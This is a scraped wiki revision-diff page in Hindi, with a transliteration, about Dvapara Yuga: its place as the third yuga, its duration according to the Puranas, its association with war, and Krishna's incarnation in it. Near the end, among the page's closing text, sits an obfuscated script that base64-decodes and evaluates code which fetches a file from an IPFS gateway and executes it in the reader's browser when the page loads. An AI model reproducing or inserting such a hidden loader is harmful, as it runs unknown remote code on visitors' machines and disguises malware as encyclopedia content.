Difference between revisions of "द्वापर युग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{Incomplete}}<br />
 
 
*यह चार युगों में तीसरा [[युग]] है। इसका आरंभ भाद्रपद कृष्ण त्रयोदशी से होता है।  
 
*यह चार युगों में तीसरा [[युग]] है। इसका आरंभ भाद्रपद कृष्ण त्रयोदशी से होता है।  
 
*इसकी अवधि [[पुराण|पुराणों]] में आठ लाख चौसठ हज़ार वर्ष मानी गई है।  
 
*इसकी अवधि [[पुराण|पुराणों]] में आठ लाख चौसठ हज़ार वर्ष मानी गई है।  
 
*यह युद्ध प्रधान युग है और इसके लगते ही धर्म का क्षय आरंभ हो जाता है।  
 
*यह युद्ध प्रधान युग है और इसके लगते ही धर्म का क्षय आरंभ हो जाता है।  
 
*भगवान [[कृष्ण]] ने इसी युग में अवतार लिया था।
 
*भगवान [[कृष्ण]] ने इसी युग में अवतार लिया था।
 
+
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 +
{{युग}}
 
[[Category:काल गणना]]   
 
[[Category:काल गणना]]   
 +
[[Category:खगोल शास्त्र]]
 
[[Category:पौराणिक कोश]]
 
[[Category:पौराणिक कोश]]
[[Category:खगोल शास्त्र]]
 
 
__INDEX__
 
__INDEX__

Revision as of 06:23, 23 September 2010

  • yah char yugoan mean tisara yug hai. isaka aranbh bhadrapad krishna trayodashi se hota hai.
  • isaki avadhi puranoan mean ath lakh chausath hazar varsh mani gee hai.
  • yah yuddh pradhan yug hai aur isake lagate hi dharm ka kshay aranbh ho jata hai.
  • bhagavan krishna ne isi yug mean avatar liya tha.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh